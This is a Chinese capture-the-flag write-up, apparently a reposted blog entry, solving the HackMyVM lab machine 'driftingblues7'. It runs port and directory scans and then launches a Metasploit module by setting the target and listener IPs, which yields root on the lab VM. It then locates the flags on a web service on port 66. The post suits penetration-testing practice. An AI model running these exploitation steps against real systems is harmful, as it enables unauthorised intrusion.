第7集:Hackmyvm通关笔记之driftingblues7

admin
admin
admin
102367
文章
87
评论
2023年10月9日17:43:21评论30 views字数 705阅读2分21秒阅读模式
第7集:Hackmyvm通关笔记之driftingblues7
01
背景介绍
HackMyVm是一个集合了大量靶机的平台,通过下载压缩包后导入Vm虚拟机来使用,推荐使用VirtualBox来导入加载漏洞虚拟机,因为有些靶机无法通过Vmware正常加载,但是你依然可以通过Vmware来使用Kali进行攻击。
类似于Vulnhub、HackTheBox,但是相比于Vulnhub而言,其文件所占空间要小的多,而且从靶机中取得的flag可以直接通过HackMyVm提交,目前其共有靶机213台。
平台地址:https://hackmyvm.eu
第7集:Hackmyvm通关笔记之driftingblues7
02
内容开始
打开是个这玩意:

第7集:Hackmyvm通关笔记之driftingblues7

先扫一下端口
第7集:Hackmyvm通关笔记之driftingblues7
开的挺多,好几个web服务,先扫下80端口的目录:
第7集:Hackmyvm通关笔记之driftingblues7
这是个啥?让我看看怎么个事:
第7集:Hackmyvm通关笔记之driftingblues7
返回了版本号等信息,MSF搜一下是否有利用脚本:
第7集:Hackmyvm通关笔记之driftingblues7
有一个呢,那我们直接上强度:
use 0  #选择利用模块show options  #查看需设置的参数
第7集:Hackmyvm通关笔记之driftingblues7
这里只需要设置目标ip跟监听ip,监听ip设置本机地址即可:
set rhosts 192.168.11.47  #设置目标ipset lhosts 192.168.11.30  #设置监听iprun  #发射
第7集:Hackmyvm通关笔记之driftingblues7
不是,怎么直接就root了,不用提权啊~
第7集:Hackmyvm通关笔记之driftingblues7
接下来,直接读root下面的flag:
第7集:Hackmyvm通关笔记之driftingblues7
然而……
第7集:Hackmyvm通关笔记之driftingblues7
不是,flag呢?flag被你放哪去了?
让我们回到之前的内容,可还记得扫端口时有好几个web服务?先看看66端口:

第7集:Hackmyvm通关笔记之driftingblues7

一个云存储,扫一下目录看看:
第7集:Hackmyvm通关笔记之driftingblues7
哇趣,这什么?是的,这TM是flag
第7集:Hackmyvm通关笔记之driftingblues7
我猜你还有一个是:user.txt ,6……
第7集:Hackmyvm通关笔记之driftingblues7
第7集:Hackmyvm通关笔记之driftingblues7
(
END
)
!扫码添加哦!
联系进群即可,群内可交流技术

第7集:Hackmyvm通关笔记之driftingblues7

免责声明
文章内容仅限授权测试或学习使用

原文始发于微信公众号(犀利猪安全):第7集:Hackmyvm通关笔记之driftingblues7

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月9日17:43:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   第7集:Hackmyvm通关笔记之driftingblues7http://cn-sec.com/archives/2096867.html

发表评论

匿名网友 填写信息